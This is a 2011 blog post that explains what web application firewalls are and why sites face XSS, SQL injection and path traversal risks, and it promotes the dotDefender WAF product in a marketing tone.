Thursday, January 20, 2011

Web Application Firewall

With reports stating that over 80% of all web sites are contain vulnerabilities that make them susceptible to Cross-Site Scripting, SQL Injection, Path Traversal, and many other exploits, many organizations have shown their concern.

Most notable is that of the Payment Card Industry (PCI) Security Standards Council who has required that in order to be in compliance, a company who processes credit cards over the Internet needs to either complete, Option 1, a web application vulnerability assessment or, Option 2, implement a web application firewall.

PCI defines a web application firewall as:

“A security policy enforcement point positioned between a web application and the client end point. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components.”

Basically, a web application firewall, or WAF, protects web applications much in the same way a traditional firewall protects a network. It controls the input and output, as well as the access to and from the asset it is protecting. However, traditional network firewalls, and even Intrusion Prevention Systems (IPS), evaluate IP packets or protocols without an awareness of the application payload so they cannot provide protection to the application layer. Without an awareness of the HTML data payload these layer 3 devices cannot recognize and overcome the types of application layer threats that make web applications vulnerable to attack.

Unlike traditional firewalls that usually block access to certain ports or filter by IP address, web application firewalls look at every request and response within the different web service layers such as HTTP, HTTPS, SOAP, and XML-RPC. The meticulous inspection of web traffic that web application firewalls perform has also earned them the nickname “Deep Packet Inspection Firewalls”.
Risks Associated with Web Applications

Falling out of PCI compliance may not be a concern for many web site owners. Many web sites simply don’t collect credit card data over the Internet and others rely on payment gateways like PayPal to handle all of their online transactions.

Unfortunately for any business or person who runs a web site, deploying any type of web application - even commercial applications or ones supported by a hosting provider - puts the web site at risk for the following:

* Web defacement and vandalism: using Path Traversal exploits, attackers can gain access to parts of your web site that the visitor never sees - the files and folders that exist outside of the web document root directory.
* Denial of Service attacks: by manipulating incoming web traffic, attackers can overload your web server or web applications causing them to crash or slow to a crawl. Visitors who have come to your site to purchase products, read your content, or participate in the community will become discouraged when the site is unavailable causing damage to your brand reputation and a potential loss in sales.
* Stolen user information: using SQL Injection exploits attackers can access any data stored in the data bases that your web site relies on. Information like user accounts, user identities, and user credit cards can be stolen or manipulated. Cross-site scripting can also be used to trick users into giving up this information as well. By uploading malicious scripts to a vulnerable web site, attackers can create a mock login area where visitors unknowingly send their information to the attacker.
* Stolen user sessions: using Cross-Site Scripting, attackers can steal a legitimate user’s session ID and manipulate it to gain access to their information.
* Being flagged as malicious by search engines: various vulnerabilities found in many web sites allow attackers to upload spam links to a site. Sites vulnerable to Cross-Site Scripting can also be exploited so that attackers can upload malicious scripts like Trojan horses, keystroke loggers, adware, spyware, and other malware. Once the search engines become aware of sites serving spam or malware, they are flagged as malicious and their page ranking drops.

The truth is, any web application is at risk. Whether it be a commercial application or a Free/Open Source application the potential for it to have vulnerabilities exists. Once these threats are known, attackers use well coordinated methods to seek out sites that are vulnerable and begin to launch their attack.
Preventing Web Application Attacks

Code reviews and vulnerability assessments are excellent ways to help seek out and patch known vulnerabilities in a web application. However, as solid as these two solutions are, they do raise two concerns.
Cost

Both code reviews and vulnerability assessments can be rather costly. One way a company can defray some of these costs is to perform these duties in house but this too may be expensive as personnel usually have to be trained in this practice. Additionally, having people dedicated to these tasks pulls them away from other duties. In smaller organizations, this may not be possible.
Zero-Day Exploits

Code reviews and vulnerability assessments work, but only against known vulnerabilities. Zero-day exploits are ones that have no patch because they have not yet been seen. Even the best reviewers and auditors cannot see into the future to recommend fixes for problems that don’t exist yet.
Web Application Firewalls

Web application firewalls are a perfect solution to the problems with code reviews and vulnerability assessments because they actively and constantly protect web applications against threats using Pattern Recognition to detect and thwart zero-day exploits and other evolving threats, Session Protection to help prevent impersonation, and a Signature Knowledgebase to block known vulnerabilities and known attackers.

With dotDefender web application firewall you can avoid many different threats to web applications because dotDefender inspects your HTTP traffic and checks their packets against rules such as to allow or deny protocols, ports, or IP addresses to stop web applications from being exploited.

Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against DoS threats, Cross-Site Scripting, SQL Injection attacks, path traversal and many other web attack techniques.

The reasons dotDefender offers such a comprehensive solution to your web application security needs are:

* Easy installation on Apache and IIS servers
* Strong security against known and emerging hacking attacks
* Best-of-breed predefined security rules for instant protection
* Interface and API for managing multiple servers with ease
* Requires no additional hardware, and easily scales with your business

The Need to Avoid Attacks

Gartner research states that 75% of all attacks happen at the application layer. As more applications are designed to run in the browser, like Google Apps and the upcoming release of Microsoft Office, and more apps are designed to run in the cloud the odds that a company’s data is vulnerable to a number of threats multiplies with each passing day.

Leaving data exposed like this is expensive. The 2003 attack against TJ Maxx cost between $500 million to $1 billion in lost income and fines. Add to this the fact that their stock fell roughly 66% and it is easy to see just how lost income is not the only way a compromised site can hurt a business’ bottom line. Small web sites are not immune to this threat. While they may not stand to have millions of dollars stolen, they are prime targets for cyber criminals who use these sites as a launching pad for malware distribution and other scams. The sites that serve as unknowing hosts to these criminals soon find their reputation ruined as they are flagged as malicious, and once their visitors are infected they rarely return.

Web application firewalls directly address these threats by examining incoming requests when they are opened by the web server. From here, the web application firewall is able to see the request exactly as the web server sees it allowing it to stop any malicious attempt in an efficient and timely manner.

When looking for a web application firewall solution, it is important to keep certain criteria in mind:

* Does the WAF provide protection to applications running on both public facing web sites and internal web sites?
* Does it support multiple web server software and operating systems?
* Does it provide out-of-the box protection?
* Does it update automatically?
* Does it integrate with other security systems?
* Is it easy to maintain?
* Is it easy to manage?

Protect Your Web Applications With dotDefender

dotDefender's unique security approach eliminates the need to learn the specific threats that exist on each web application. The software that runs dotDefender focuses on analyzing the request and the impact it has on the application. Effective web application security is based on three powerful web application security engines: Pattern Recognition, Session Protection and Signature Knowledgebase.

The Pattern Recognition web application security engine employed by dotDefender effectively protects against malicious behavior such as the attacks mentioned above, and many others. The patterns are regular expression-based and designed to efficiently and accurately identify a wide array of application-level attack methods. As a result, dotDefender is characterized by an extremely low false positive rate.

What sets dotDefender apart is that it offers comprehensive protection against threats to web applications while being one of the easiest solutions to use.

In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the box protection that can be easily managed through a browser-based interface with virtually no impact on your server or web site’s performance.

No comments:

Post a Comment

MyUrduStuff

Search This Blog

My Urdu Stuff